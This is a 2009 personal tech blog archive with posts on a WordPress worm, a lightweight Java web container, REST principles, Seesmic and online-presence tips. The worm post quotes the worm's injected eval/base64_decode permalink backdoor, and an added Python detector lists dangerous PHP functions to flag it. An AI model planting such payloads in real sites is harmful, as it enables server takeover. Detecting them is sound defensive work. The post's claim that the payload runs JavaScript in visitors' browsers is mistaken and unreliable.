Updates from September, 2009

  • Nuno Morgadinho 7:25 am on September 7, 2009

    JavaScript eval() is EVIL 

    The blogosphere is full of mentions of the worm that is attacking old versions of the WordPress blog platform, and of the attack on the popular Scobleizer blog. I was reading about it over the weekend, particularly how the worm works, what it does, how to prevent it and how to recover from it. As Matt Mullenweg, creator of WordPress, puts it: "This particular worm, like many before it, is clever". One of the things it does is change the blog's links to something like this:
    /post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
    
    and this in turn allows the evaluated code to be executed. “eval” is evil, huh? Although it's not something new, it is still quite cunning. The eval() function evaluates a string and executes it as if it were script code. This means that when a user clicks the link on the affected blog, arbitrary JavaScript code will run in the user's browser. Not good.
    http://wordpress.org/development/2009/09/keep-wordpress-secure/
    http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
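    For anyone checking their own blog, here is an added example (not part of the original post and not WordPress's own code) that inspects a stored permalink structure, such as the value of the permalink_structure option, for the kind of injection quoted above: it URL-decodes the string repeatedly, flags PHP constructs and superglobals that never belong in a permalink, and flags any %tag% that is not one of the documented structure tags.

```python
import re
from urllib.parse import unquote

# Constructed samples: a normal WordPress permalink structure and the injected
# one quoted in the post above (URL-encoded, as it appears in the blog's links).
CLEAN = "/%year%/%monthnum%/%postname%/"
INJECTED = "/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"

# Structure tags WordPress documents; anything else between % signs is a red flag.
KNOWN_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
              "post_id", "postname", "category", "author"}

# PHP constructs that have no business in a permalink string.
DANGEROUS = re.compile(
    r"\b(eval|base64_decode|assert|system|exec|passthru)\s*\(|\$_(SERVER|GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE)


def decode_fully(value):
    """Undo URL encoding until nothing changes, so double encoding cannot hide a payload."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value


def findings(structure):
    """Return human-readable reasons why the permalink structure looks injected."""
    decoded = decode_fully(structure)
    issues = ["dangerous construct: " + m.group(0) for m in DANGEROUS.finditer(decoded)]
    # Every %...% token must be a documented tag; the worm's payload is not.
    for tag in re.findall(r"%([^%/]*)%", decoded):
        if tag not in KNOWN_TAGS:
            issues.append("unknown permalink tag: %" + tag + "%")
    return issues


def is_injected(structure):
    return bool(findings(structure))


if __name__ == "__main__":
    for label, value in (("clean", CLEAN), ("injected", INJECTED)):
        print(label, "->", findings(value) or "ok")
```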
     
  • Nuno Morgadinho 5:24 pm on July 14, 2009

    The Gizmo: small and lightweight Java container for web apps 

    You know what they say, “less is more”, right? If you have ever looked at Java tools for building web applications you’ve probably stumbled upon dozens of options. So did I, but because @herrb had mentioned at lunch a web thingy he was developing for himself to play around with, I asked him for advice on what Java tools I could use, and this ended with an invitation to look at what he had done.

    His starting point was: how hard would it be to use Eclipse+Eclipse plugins to develop web apps?

    So he started developing the thing and now it’s using:

    • A custom http server based on Apache’s httpcomponents lib
    • The Dojo Toolkit as a Javascript library
    • Freemarker as a Template Engine
    • Eclipse EMF to describe the data schemas
    • Apache log4j as a logger

    We also talked about working on it together, so we ended up publishing it on SourceForge for now. We called it “the Gizmo”. It’s not big and powerful like Apache’s Tomcat, but it can be useful for someone looking for a small and lightweight Java container for web apps.

    It is also important to understand that the initial goal was more to understand how things work and how he could play with them, plugging them together and so on, rather than to build a full-blown framework. I’ve been using it myself for a small web app that @aaires and I are doing in our free time, and so far we’ve been happy with it. I wouldn’t say it is ready for production, but it is something I would like to help develop further, especially because there are so many interesting Java libraries out there that we could use in conjunction with the Gizmo, and also because using Eclipse for development is just plain fun.

    You can take a look at:

    http://lipog.sf.net

     
    • Joerg 7:02 am on July 27, 2009

      Shameless little plug: as of this last weekend the Gizmo also allows for splendid automatic testing of your web apps based on HtmlUnit! It all comes with a tutorial and a little example too. ;-)

      Cheers,
      J.

  • Nuno Morgadinho 7:13 am on June 5, 2009

    Bullet Points about REST 

    REST stands for Representational State Transfer.

    What is the problem?

    • Software architecture research investigates methods for determining how best to partition a system, how components identify and communicate with each other, how they evolve, etc.
    • Do we know any large software architecture that has scaled immensely? Can we learn/take something from it? Yes, the Web and the Internet in general.

    What can we learn from it?

    • Client-server (separation of concerns)
    • Stateless (requests can be processed by different servers for scalability)
    • Caching (performance and fault tolerance)
    • Uniform interface (URI represents object and state)
    • Layered System (components build on top of other components)

    Example

    • Client-server => browser-httpd
    • Stateless, Uniform interface => /car/parts/12337 => URI represents the object and asks for a specific resource.
    • Can be processed by any server because there is no context
    • Output in html, XML or JSON

    Example 2

    • Imagine you could just re-use the component by redirecting requests to it
    • Example: user auth
    • Instead of having user auth encapsulated in the application, we can make user auth a web service that can be re-used by any application – this is RESTful
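    To make the bullets above concrete, here is an added example (mine, not from the original post) of a stateless handler for the /car/parts/12337 URI used in Example 1: the request alone identifies the resource, so any server instance can answer it; the representation is chosen from HTML, XML or JSON via the Accept header; and an ETag derived from the representation supports the caching bullet. The PARTS data and the handle() signature are constructed for the example.

```python
import hashlib
import json
from xml.etree import ElementTree as ET

# Constructed sample data standing in for the resource behind /car/parts/12337.
PARTS = {12337: {"id": 12337, "name": "brake pad", "price": "31.50"}}

# One renderer per media type the post lists: HTML, XML and JSON.
RENDERERS = {
    "application/json": lambda p: json.dumps(p, sort_keys=True),
    "application/xml": lambda p: ET.tostring(
        ET.Element("part", {k: str(v) for k, v in p.items()}), encoding="unicode"),
    "text/html": lambda p: "<dl>" + "".join(
        "<dt>%s</dt><dd>%s</dd>" % kv for kv in sorted(p.items())) + "</dl>",
}


def handle(method, path, accept="application/json", if_none_match=None):
    """Uniform, stateless interface: everything needed to answer is in the
    request itself, so any server instance can process it (no session)."""
    if method != "GET":
        return 405, {}, "method not allowed"
    segments = path.strip("/").split("/")
    # Serve only the documented URI shape; the id must be a plain integer.
    if len(segments) != 3 or segments[:2] != ["car", "parts"] or not segments[2].isdigit():
        return 404, {}, "not found"
    part = PARTS.get(int(segments[2]))
    if part is None:
        return 404, {}, "not found"
    render = RENDERERS.get(accept)
    if render is None:
        return 406, {}, "not acceptable"
    body = render(part)
    # Caching: a validator derived from the representation lets clients and
    # intermediaries revalidate with a cheap conditional GET instead of refetching.
    etag = '"%s"' % hashlib.sha256(body.encode()).hexdigest()[:16]
    headers = {"Content-Type": accept, "ETag": etag}
    if if_none_match == etag:
        return 304, headers, ""
    return 200, headers, body


if __name__ == "__main__":
    for accept in RENDERERS:
        print(accept, handle("GET", "/car/parts/12337", accept))
```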
     
  • Nuno Morgadinho 5:19 am on May 31, 2009

    Seesmic: Why I don't use it.. 

    One of the reasons I don’t use Seesmic is that there are no interesting people there. Can you prove me wrong?

    How about starting a site where invited entrepreneurs hang out and post video content?

    Probably a dumb idea..

     
  • Nuno Morgadinho 4:51 am on May 23, 2009

    12 Steps to Reinforce Your On-Line Presence 

    Need to reinforce your presence on-line?

    • Have a central location and link from as many sites as you can to yours.
    • Have a nice central location.
    • Work on cool projects.
    • Share with your viewers interesting content that they cannot get elsewhere.
    • Build your central location in a way that people can interact.
    • Use SEO; Use consulting

    Twelve steps:

    • Providing good content should always be the key. Like gskinner and dougmccane, you need a language/technology and you need to focus on that. Sorry, but you can’t really be good at something if you’re always trying out different things.
    • Work on cool projects that you love. With people you love. Make things people want.
    • Start by solving your own problems.
    • Port your blog to a nice blogging engine and make it look nice.
    • Talk with a consultant to get your SEO skills up to date.
    • Have a “badge” for people to put on their sites and link to yours. This might be complicated: what would your badge be, and why would people link to you? Well, people will link to you if you provide good and fresh content, that’s for sure, so you probably don’t need the badge.
    • Make things that bring your local community together for a greater cause.
    • Talk with interesting people about interesting stuff and publish your conclusions.
    • Now is the time to bring out all your energy, all your passions, the best you want to do with the world. The time is now.
    • Test and benchmark cool and interesting stuff.
    • Document: sounds boring? Maybe, but you’ll be doing everybody a favour, not least yourself. Forcing yourself to explain things crystallises your own understanding.
    • There is an enormous need for testing guys. Help open-source projects by testing their code. Publish the results.
    • How can people interact with you? Twitter, comments on your blog. What other ways are out there? FriendFeed, Facebook, etc. Explore those new mechanisms, but in the end don’t forget about the basics. Maybe a mailing list or a Google group works.
    • People like exclusive content: Organize something
    • Comment on other people’s blogs. People normally follow the links.

    And you’re right, that was more than 12 steps :-)

     